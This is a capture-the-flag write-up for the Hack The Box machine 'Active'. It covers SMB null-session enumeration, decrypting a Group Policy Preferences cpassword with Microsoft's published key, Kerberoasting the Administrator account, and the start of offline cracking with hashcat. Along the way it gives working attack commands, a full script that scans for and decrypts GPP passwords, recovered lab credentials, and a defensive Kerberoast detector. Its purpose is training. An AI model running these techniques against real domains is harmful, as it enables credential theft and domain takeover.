Active is a Windows machine from Hack The Box: a Server 2008 R2 domain controller for the active.htb domain at 10.10.10.100. Start with a version and default-script scan, saving every output format under the name active:
nmap -sV -sC -oA active 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-27 22:55 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 22.22% done; ETC: 22:56 (0:00:21 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.31s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-28 02:55:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-08-28T02:56:46
|_ start_date: 2023-08-28T02:44:46
|_clock-skew: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.36 seconds
NMAP scan explained
nmap -sV -sC -oA active 10.10.10.100
As per the Nmap website:
"To reflect those different uses and to simplify the choice of which scripts to run, each script contains a field associating it with one or more categories. Currently defined categories are `auth`, `broadcast`, `default`, `discovery`, `dos`, `exploit`, `external`, `fuzzer`, `intrusive`, `malware`, `safe`, `version`, and `vuln`. These are all described in [the section called “Script Categories”](https://nmap.org/book/nse-usage.html#nse-categories "Script Categories")."
Searching for scripts
So in the command nmap -sV -sC -oA active 10.10.10.100:
- `-sC`: runs a script scan with the default set of NSE scripts, equivalent to `--script=default`. A script is placed in the `default` category when it is fast, reliable, useful against most targets and low-risk; these are enumeration and banner-style checks (the dns-nsid, smb2-security-mode and smb2-time output above), not vulnerability checks, which live in the `vuln` category and are not run by `-sC`.
- `-sV`: service/version detection on each open port. Nmap does not just report that port 80 is open, it tries to tell Apache from nginx and which version is running. `-sV` also runs the scripts in the `version` category, which refine that detection.
- `-oA active`: writes normal, grepable and XML output to active.nmap, active.gnmap and active.xml.
To see which scripts in those two categories touch SMB, grep the categories line of every .nse file on disk (`nmap --script-help "default and smb*"` gives the same answer with descriptions):
```bash
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate -r '\.nse$' | xargs grep categories | grep 'default\|version' | grep smb
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"}
/usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
```
To also see what the “safe” category adds:
```bash
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"}
/usr/share/nmap/scripts/smb-enum-services.nse:categories = {"discovery","intrusive","safe"}
/usr/share/nmap/scripts/smb-ls.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-mbenum.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-protocols.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"}
/usr/share/nmap/scripts/smb2-capabilities.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"}
/usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
/usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"}
```
So to run only the safe category against the SMB port (note the option is `--script`, two hyphens):
nmap --script safe -p 445 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-28 06:03 EDT
Pre-scan script results:
| broadcast-dns-service-discovery:
| 224.0.0.251
| 443/tcp hue
| Address=192.168.1.121 fe80::eeb5:faff:fe3f:43f3
| 8009/tcp googlecast
| id=4d2af0de7f5852642fd2d0b454e63b9a
| cd=CFC87D16FF43ADAFB6C7E851317CD8C2
| rm=3DFFE977CB4B85C7
| Address=192.168.1.6
| 10001/tcp googlezone
| Address=192.168.1.6
| 45670/tcp airplay
| acl=0
| deviceid=5C:C1:D7:2B:2C:B2
| features=0x7F8AD0,0x38BCB46
| rsf=0x3
| fv=p20.T-NKLUABC-2410.0
| flags=0x204
| model=UTU8000
| manufacturer=Samsung
| serialNumber=0A363NFN601123T
| protovers=1.1
| srcvers=377.25.06
| pi=22:4C:DA:D7:69:8A
| psi=00000000-0000-0000-0000-224CDAD7698A
| gid=00000000-0000-0000-0000-224CDAD7698A
| Address=192.168.1.92
| 49155/tcp rdlink
| Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
| 49155/tcp rdlink
| Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
| 49478/tcp companion-link
| rpMac=0
| rpHN=ac2159579038
| Address=192.168.1.136 fe80::c3b:b165:3fbe:2b39
| 51676/tcp companion-link
|_ Address=192.168.1.130 fe80::464:337e:2dfe:f7ca
| broadcast-upnp-info:
| 239.255.255.250
| Server: Linux UPnP/1.0 Huawei-ATP-IGD
|_ Location: http://192.168.1.1:37215/upnpdev.xml
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.30s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2:0:2
|_ 2:1:0
| smb2-time:
| date: 2023-08-28T10:04:15
|_ start_date: 2023-08-28T02:44:46
| smb2-capabilities:
| 2:0:2:
| Distributed File System
| 2:1:0:
| Distributed File System
| Leasing
|_ Multi-credit operations
| dns-blacklist:
| SPAM
|_ l2.apews.org - FAIL
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| port-states:
| tcp:
|_ open: 445
|_fcrdns: FAIL (No PTR record)
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 2s
Post-scan script results:
| reverse-index:
|_ 445/tcp: 10.10.10.100
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds
The safe run adds little. The broadcast-* pre-scan scripts query the attacker's own LAN, not the target (the mDNS and UPnP devices listed above are on 192.168.1.0/24), and the scripts that would enumerate services, the browser list and MSRPC endpoints fail because they need SMB1 or an authenticated session. The two useful facts are the supported dialects (SMB 2.0.2 and 2.1 only, consistent with Server 2008 R2) and that message signing is required, so relaying to this host is not an option. The next step is a null session.
Use smbclient to list the shares with a null session (empty password, anonymous login):
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient -L //10.10.10.100
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
NETLOGON, SYSVOL, Replication and Users are all listed anonymously, and Replication is not a default share. Try to pull it recursively with smbmap (smbmap -r Replication -H 10.10.10.100). This failed with a Python UnboundLocalError inside smbmap itself (priv_status), a bug in that smbmap release rather than an access denial from the server:
└─$ smbmap -r Replication -H 10.10.10.100
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Bummer: cannot access local variable 'priv_status' where it is not associated with a value
Next attempt was impacket's smbclient.py with smbclient.py '@IP_ADDRESS' -share SHARE_NAME -command 'recurse ON; prompt OFF; mget *'.
That did not work either: impacket's smbclient.py has no -share or -command options (it is an interactive mini-shell; a batch of commands can be fed to it with -file), and recurse and prompt are Samba smbclient commands, not impacket ones.
Samba's smbclient did the job. The command is smbclient //10.10.10.100/Replication -U ""%"" (empty username and empty password, i.e. a null session), then recurse ON, prompt OFF and mget * mirror the whole share to the current directory. The Policies tree that comes back is a copy of SYSVOL:
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (2.2 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (0.9 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \>
Why Groups.xml matters (the pointer came from ChatGPT; the details are from Microsoft's MS-GPPREF specification and bulletin MS14-025):
- Groups.xml is a Group Policy Preferences (GPP) file. A GPP item that creates or updates a local account stores the account's password in the cpassword attribute.
- cpassword is not a hash. It is the password AES-256-encrypted with a fixed key that Microsoft published in MS-GPPREF, so anyone who can read SYSVOL (every domain user, and here an anonymous session) can recover the cleartext.
- MS14-025 (2014) stopped Group Policy from creating new items with passwords, but it does not remove existing ones, which is why these files still turn up on domain controllers. The same attribute can appear in ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml and Printers.xml.
Searching for this file after it downloaded with the mget
┌──(kali㉿kali)-[~/HTB/Active]
└─$ locate Groups.xml
/home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cd /home/kali/HTB/Active/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ more Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassw
ord="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acct
Disabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
The cpassword can be decrypted with a short Python script (this one was found online); it needs pycryptodome for the AES part. Kali also ships gpp-decrypt, which does the same thing.
┌──(kali㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─$ pip install pycryptodome
Defaulting to user installation because normal site-packages is not writeable
Collecting pycryptodome
Obtaining dependency information for pycryptodome from https://files.pythonhosted.org/packages/40/88/89623388754162ddb82c62814ccbfdbfcc8ed9bd6d5f7412d2479bdca3a7/pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata
Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)
Downloading pycryptodome-3.18.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 6.0 MB/s eta 0:00:00
Installing collected packages: pycryptodome
Successfully installed pycryptodome-3.18.0
The Python code, as found, with the placeholder still in place:
```python
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode
import binascii


def decrypt_cpassword(cpassword):
    # Static AES-256 key published by Microsoft in MS-GPPREF (section 2.2.1.1.4)
    key = binascii.unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
    # GPP strips the base64 '=' padding; restore it before decoding
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    cpassword_decoded = b64decode(cpassword)
    # AES-256-CBC with an all-zero IV; the plaintext is PKCS#7 padded
    cipher = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16)
    decrypted = unpad(cipher.decrypt(cpassword_decoded), 16)
    # The cleartext is UTF-16LE (the spec's byte order; 'utf16' would guess the host's)
    return decrypted.decode('utf-16-le')


# Test with a sample cpassword (replace before running: the placeholder is not valid base64)
cpassword = "YourEncryptedPasswordHere"
print(decrypt_cpassword(cpassword))
```
Replace the placeholder with the cpassword value from Groups.xml (the rest of the script is unchanged) and save it as decode.py:
```python
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
print(decrypt_cpassword(cpassword))
```
Run the python script
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ./decode.py
GPPstillStandingStrong2k18
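The decoder above handles one value pasted by hand. What follows is an added example, not the page's script or any tool the page mentions, that generalises it: it walks a downloaded Policies tree, checks every GPP XML file that can carry a cpassword (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml, Printers.xml), and reports the account and cleartext for each hit. SAMPLE_GROUPS_XML is the Groups.xml from this box embedded so the script runs offline; the file list, the account-attribute list and the pycryptodome-or-cryptography fallback are assumptions of the example.

```python
#!/usr/bin/env python3
"""Find and decrypt every GPP cpassword in a downloaded SYSVOL/Replication tree.

Added example (not the script from the write-up). Assumes pycryptodome or the
'cryptography' package is installed and that the directory layout is the one
smbclient's 'mget *' produced (active.htb/Policies/{GUID}/MACHINE/Preferences/...).
"""
import base64
import os
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MS-GPPREF section 2.2.1.1.4
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

try:  # pycryptodome, as installed on the page
    from Crypto.Cipher import AES

    def _aes_cbc_decrypt(data: bytes) -> bytes:
        return AES.new(GPP_KEY, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(data)
except ImportError:  # fallback to pyca/cryptography (assumption: one of the two is present)
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc_decrypt(data: bytes) -> bytes:
        dec = Cipher(algorithms.AES(GPP_KEY), modes.CBC(b"\x00" * 16)).decryptor()
        return dec.update(data) + dec.finalize()


def decrypt_cpassword(cpassword: str) -> str:
    """cpassword -> cleartext: base64 without '=' padding, AES-256-CBC, zero IV,
    PKCS#7 padding, UTF-16LE text."""
    cpassword += "=" * (-len(cpassword) % 4)       # restore stripped base64 padding
    plain = _aes_cbc_decrypt(base64.b64decode(cpassword))
    pad = plain[-1]                                 # PKCS#7: last byte = pad length
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword?")
    return plain[:-pad].decode("utf-16-le")


# GPP files that may carry a cpassword (assumed list), and the attribute naming
# the account in each preference type (Groups: userName, tasks: runAs, services:
# accountName, data sources / drives: username)
GPP_FILES = ("Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def find_gpp_passwords(xml_text, source: str = "<string>") -> list:
    """One record per element with a non-empty cpassword; xml_text is str or bytes."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if not cpw:          # attribute absent or empty: no password stored
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
        found.append({"source": source, "element": elem.tag, "account": account,
                      "password": decrypt_cpassword(cpw)})
    return found


def scan_sysvol(root_dir: str) -> list:
    """Walk a downloaded Policies tree and collect every decrypted cpassword."""
    results = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:    # bytes: let the parser honour the XML encoding
                    results.extend(find_gpp_passwords(fh.read(), path))
    return results


# Constructed sample: the Groups.xml from this box, minus the XML declaration
SAMPLE_GROUPS_XML = (
    r'<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    r'<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" '
    r'image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">'
    r'<Properties action="U" newName="" fullName="" description="" '
    r'cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" '
    r'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" '
    r'userName="active.htb\SVC_TGS"/></User></Groups>'
)

if __name__ == "__main__":
    import sys
    hits = (scan_sysvol(sys.argv[1]) if len(sys.argv) > 1
            else find_gpp_passwords(SAMPLE_GROUPS_XML, "Groups.xml"))
    for h in hits:
        print(f"{h['source']}: <{h['element']}> {h['account']} -> {h['password']}")
```

Run it with the directory that mget produced as the only argument (`python3 gpp_scan.py active.htb/Policies`); with no argument it decrypts the embedded sample. Elements with an empty cpassword are skipped rather than reported, since GPP writes `cpassword=""` for items that set no password.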
Connect to the shares with smbclient using the recovered username and password. SVC_TGS is a domain account, so the Users share is now readable:
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278327 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Aug 27 22:45:51 2023
5217023 blocks of size 4096. 278327 blocks available
smb: \SVC_TGS\Desktop\> cat users.txt
cat: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
┌──(kali㉿kali)-[~/HTB/Active]
└─$ ls
active.gnmap active.htb active.nmap active.xml decode.py kerbrute users.txt user.txt
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat user.txt
7230de90eec1be42f0ae91ed9e955dca
┌──(kali㉿kali)-[~/HTB/Active]
With valid domain credentials the next step is Kerberoasting with impacket's GetUserSPNs.py. It queries LDAP for user accounts that have a servicePrincipalName set and, with -request, asks the KDC for a service ticket for each one. Any domain user may request such a ticket, and it is encrypted with the service account's own key, so it can be cracked offline. Here the only SPN in the domain (active/CIFS:445) is registered on the Administrator account, which turns a service-account weakness into a domain-admin one:
└─$ ./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-27 22:45:57.011359
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e69032a5dce3d0f1774ce9dac1574da8$... (ticket blob truncated here; the full hash, which was saved to the file active, appears in the hashcat output below)
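For the defensive side, an added example (not from the write-up) of what this request looks like to a SOC. The $krb5tgs$23$ prefix means the ticket was issued with etype 23 (RC4-HMAC), which the domain controller logs in Security event 4769 as TicketEncryptionType 0x17; in that event the ServiceName field is the service account's name (Administrator here), not the SPN string. The sample events and the alert threshold are constructed for the example and the field names follow the 4769 schema.

```python
#!/usr/bin/env python3
"""Spot Kerberoasting in Windows Security event 4769 records.

Added example, not part of the original write-up. The hash cracked on the page
is '$krb5tgs$23$...': etype 23 is RC4-HMAC, which a DC logs in event 4769 as
TicketEncryptionType 0x17. The SAMPLE_EVENTS below are constructed for this
example; the threshold is an assumption to tune per environment.
"""
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23: what GetUserSPNs.py asks for so the ticket cracks fast

# Constructed 4769 records (the fields a log forwarder carries for this event)
SAMPLE_EVENTS = [
    # SVC_TGS requesting an RC4 ticket for a user-account SPN: the page's attack
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    # same client roasting a second (hypothetical) service account
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    # workstation getting an AES ticket for the DC's machine account: benign
    {"TargetUserName": "WS01$@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    # ticket for krbtgt with RC4: TGT traffic, not a roast
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.51", "Status": "0x0"},
    # failed request (0x7 = SPN not found): no ticket issued, nothing to crack
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.51", "Status": "0x7"},
]


def is_roast_candidate(ev: dict) -> bool:
    """An RC4 service ticket that was actually issued for a user account:
    not a machine account (name ends in '$') and not the krbtgt account."""
    svc = ev.get("ServiceName", "")
    return (ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoast(events, min_services: int = 1) -> list:
    """Group candidate 4769s by (requesting account, source IP) and alert when
    one requester pulled RC4 tickets for at least `min_services` distinct
    user-account services. A tool like GetUserSPNs.py -request asks for every
    SPN it finds in one burst, so the distinct-service count is the signal."""
    per_requester = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            per_requester[key].add(ev["ServiceName"])
    return [
        {"requester": who, "source_ip": ip, "services": sorted(svcs)}
        for (who, ip), svcs in sorted(per_requester.items())
        if len(svcs) >= min_services
    ]


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS):
        print(f"Kerberoast: {alert['requester']} from {alert['source_ip']} "
              f"requested RC4 tickets for {', '.join(alert['services'])}")
```

In a domain where RC4 is still negotiated by old clients a single RC4 ticket is noisy, so raise min_services; in a domain that has moved to AES, one 0x17 ticket for a user-account SPN is already worth a look. The durable fix is on the account side: no SPN on privileged accounts, and long random passwords or a group managed service account for the accounts that must have one.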
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less
Hash mode #13100
Name................: Kerberos 5, etype 23, TGS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
Crack it with hashcat mode 13100 (Kerberos 5, etype 23, TGS-REP, the format matching the $krb5tgs$23$ prefix) and rockyou. The hash was saved to the file active:
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 13100 /home/kali/HTB/Active/active /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
